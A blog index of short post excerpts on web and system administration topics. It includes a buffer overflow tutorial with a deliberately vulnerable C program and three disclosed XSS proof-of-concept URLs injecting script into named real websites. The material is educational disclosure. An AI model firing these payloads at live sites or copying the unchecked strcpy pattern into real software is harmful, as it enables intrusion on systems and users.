Fixing Mixed Content warnings using CRONjobs
So if you, like myself, have a HTTPs only website you may have noticed that your green bar, green label or security shield (image below) disappears if your webpage fetches an image from another website over HTTP and not HTTPS. Chrome Secure Green Lock Now this isn’t an issue in itself which is why all…read more.
CTF: HACKvent 2015 – Hacking-lab
Hackvent 2015, a capture the flag event which runs over the course of December is about to begin! Click here to sign up and participate!
How to fix your League of Legends Registry Paths (OP.GG fix)
Artist: Awskitee The issue If you play League of Legends and use any third party tools (to record replays, enhance gameplay, among other things :p) then you have probably run into programs that ask for the path of your League of Legends directory. Fortunately, some programs can auto detect this using the Windows registry. However, if…read more.
WordPress: Regexp and Post Views Counter Plugin
Unfortunately, the WordPress theme I am using did not show any views for each post. While I already had an analytics account, I wanted to display the number of total unique views on my website. I quickly found a plugin called the Post Views Counter by Dfactory. I installed it and configured it so I could…read more.
How to get overall CPU utilization from the bash command line (Linux)
For a little project I worked on I needed to get the CPU utilization as a percentage. I Google’d the issue and searched for “cpu utilization bash“. To my surprise there were no elegant solutions. Most just failed to work (on my machine anyway) while others were very inaccurate. For example, some would show the same number…read more.
How to get an A+ on Qualy’s SSL Labs Server Test (Apache)
The SSL Server Test by Qualy’s SSL Labs is an easy way to determine how secure your SSL set up actually is. You can run the test at: https://www.ssllabs.com/ssltest/ This is the score for this domain/server: How to get an A+ score on an Apache HTTP server The default Apache configuration for websites running HTTPs leaves your set…read more.
Simple Buffer Overflow Example
I’m posting this example because the current buffer overflow examples on the web are not that good. This is a step by step guide to how to exploit a program that is vulnerable to a buffer overflow attack. The Code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
#include <stdio.h> #include <string.h> #include <stdlib.h> int main ( int argc , const char * argv[]) { if (argc != 2) { printf ("Usage: %s <text>" , argv[0]); exit (1); } char buf[1024]; strcpy (buf , argv[1]); printf ("You wrote:n%sn" , buf); return 0; } |
This is the vulnerable code that we will be attacking. In this case, the…read more.
Finland MSN XSS Vulnerability
The search bar on this page fails to encode the quotes (“) and as a result a onMouseOver event tag can be attached to the search bar which allows an XSS attack to occur. Code:
1 2 3 4 5 |
http://ideakeittio.fi.msn.com/ruokaohjehaku/ ?q=" onMouseOver=alert(/XSS/) " &mealtypes=suolaiset &mealtypes=leivonta-2 &main_ingredient=1 |
CSE.UNSW.EDU.AU XSS Vulnerability
The staff search page does not sanitise the input of the ID field allowing an XSS attack to be executed. Code:
1 2 |
http://www.cse.unsw.edu.au/db/staff/staff.php ?ID="><script>prompt(42)</script> |
Mashable XSS Vulnerability
The Mashable subscription script fails to sanitise the email field and prints the invalid email on an error page. Code:
1 2 3 |
http://mashable.com/follow/subscriptions/ ?email="><script>alert(1)</script> &fingerprint=be0c8a1f226d1d986340c66ca8d701fffbd1f644 |